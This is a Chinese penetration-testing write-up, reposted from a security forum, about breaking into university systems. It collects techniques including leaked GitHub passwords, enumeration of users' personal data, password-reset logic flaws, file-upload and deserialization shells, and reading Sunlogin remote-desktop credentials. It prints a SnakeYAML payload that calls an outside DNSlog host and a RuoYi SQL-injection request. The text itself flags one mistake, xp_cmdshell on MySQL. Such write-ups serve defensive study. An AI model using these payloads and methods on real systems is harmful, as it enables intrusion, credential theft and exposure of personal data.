1、OA系统密码找回
系统使用说明文档中发现登录账号 600030
2、逻辑漏洞修改密码
GitHub密码泄漏
GitHub泄漏学号密码
但账号已被禁用
通过以下接口获得用户ID /User/GetUserListByKeyWord
可以通过以下接口遍历用户ID,获取任意用户的姓名 手机号 邮箱等敏感信息
/User/Tip?time61&id=caec35e7-9956-4f68-98bc-e2aee73ebda5&_=1664438691592
输入手机号,点击获取验证码并抓包
记录回包内容
"datas":"{\"sign\":\"407ec6dc275f4766a4525e059a60ca16\"}","code":"0","message":"获取成功"
可以看到页面跳转到了设置密码
成功更改密码
79个应用,通过其中一个aspx站SQL注入拿到shell
3、Github泄漏账号密码
1、GitHub搜索"学校域名" "password" 发现邮箱账号密码
3、手机号加邮箱密码直接登录统一门户
跳转到泛微OA,文件上传GetShell
4、向日葵密码读取
heapdump文件泄漏
直接下载heapdump文件
成功连接mysql服务器,执行xp_cmdshell(这里应该是作者笔误、或者拿其他环境配错了,mysql没有xp_cmdshell)
C:\Program Files\Oray\SunLogin\SunloginClient\config.ini为向日葵的默认安装配置文件,直接尝试读取
fastcode将第一位字母去除就为本机识别码,encry_pwd为加密后的本机验证码
可以使用GitHub解密项目进行解密,解密后成功连接目标主机服务器
5、若依漏洞GetShell
1、某学院首页
org.yaml.snakeyaml.Yaml.load('!!javax.script.ScriptEngineManager [ !!java.net.URLClassLoader [[ !!java.net.URL ["ftp://ceshi.bdtmos.dnslog.cn"] ]] ]')运行任务
DNSlog平台收到请求
连接内存马
发现历史入侵痕迹,发现fscan黑客漏扫工具
/system/role/list
/system/role/export
/system/dept/edit
Host:
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=e9f143b9-3c3d-4acb-96a4-93c7367a98e9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 75
params[dataScope]=andextractvalue(1,concat(0x7e,(selectdatabase()),0x7e))
6、FCKeditor上传文件GetShell
7、任意文件上传
8、S2反序列化漏洞GetShell
9、逻辑漏洞
1、某站点找回密码处,短信验证码直接出现在回包中
10、geoserver弱口令
登录后进入配置页面,点击查看其中的数据存储
同时发现目标ip还对外开启了mysql数据库,使用root和上文获取到的密码,成功连接上。
8888端口后台登录页,使用数据库中获取到的账号密码成功登录后台,发现是个金碟的系统,然后使用了文件上传漏洞,成功getshell(截图和payload有点敏感,就不放了)
总结
对于高校的渗透可以从以下几点入手,总结起来就是多信息收集,信息收集yyds!!!
文章来源:奇安信攻防社区(苏苏的五彩棒) 原文地址:https://forum.butian.net/share/2423,若有侵权请联系删除